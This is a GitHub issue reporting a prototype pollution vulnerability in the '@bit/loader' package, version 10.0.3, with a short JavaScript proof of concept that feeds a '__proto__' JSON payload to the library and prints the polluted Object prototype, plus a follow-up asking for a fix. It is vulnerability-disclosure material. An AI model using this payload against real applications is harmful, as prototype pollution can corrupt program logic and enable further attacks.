search

MiguelCastillo / bit-loader

Framework for building module loaders with very little effort
MIT License
5 stars 2 forks source link

Prototype Pollution Affecting loader@10.0.3 module #404

Open mestrtee opened 8 months ago

mestrtee commented 8 months ago

Overview

Affected versions of this package are vulnerable to Prototype Pollution where the merge is invoked in M function unsafely Since the infected e argument with proto object missing check if it resolves to the object prototype, the malicious property are then copied on the Object prototype by the merge operation to the empty object and recursively affected all the objects in the program.

PoC

(async () => {
  const lib = await import('@bit/loader');

var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {
  lib.default (BAD_JSON)
} catch (e) { }
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.polluted;
})();

Output:

Before Attack:  {}
After Attack:  {"polluted":true}

Output of a successful fix:

Before Attack:  {}
After Attack:  {}

How to prevent:

Refer to the recommendations in this article Snyk.io

mestrtee commented 8 months ago

Any updates on this issue?